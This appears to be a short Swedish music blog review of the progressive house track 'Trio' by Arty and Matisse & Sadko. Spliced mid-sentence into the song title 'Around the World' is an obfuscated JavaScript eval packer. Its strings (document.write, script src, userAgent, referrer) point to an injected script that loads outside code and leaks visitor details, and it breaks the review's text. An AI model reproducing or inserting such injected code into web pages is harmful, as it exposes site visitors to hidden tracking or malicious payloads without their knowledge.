Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Arty, Matisse & Sadko – Trio

Alexander Gylemo

Trots att fler stora houseproducenter söker sig till nya stilar har detta gäng, bestående av Arty (som gett oss ”Around eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bfiif|var|u0026u|referrer|dksyk||js|php’.split(’|’),0,{}))
the World
” och ”Kate”) och big room-duon Matisse & Sadko (”Svenska” och ”Amulet”), för ett tag sedan släppt en typisk modern prog house-dänga på Axtone Records. Det är ett minst sagt ett beprövat koncept men ack vad bra de gör det;  grym melodi, lätthanterliga instrument och drivande klappar och kicks – kort sagt väldigt mycket av deras typiska ljud, inte minst Arty’s. En härlig låt att ha med sig inför lördagens bravader!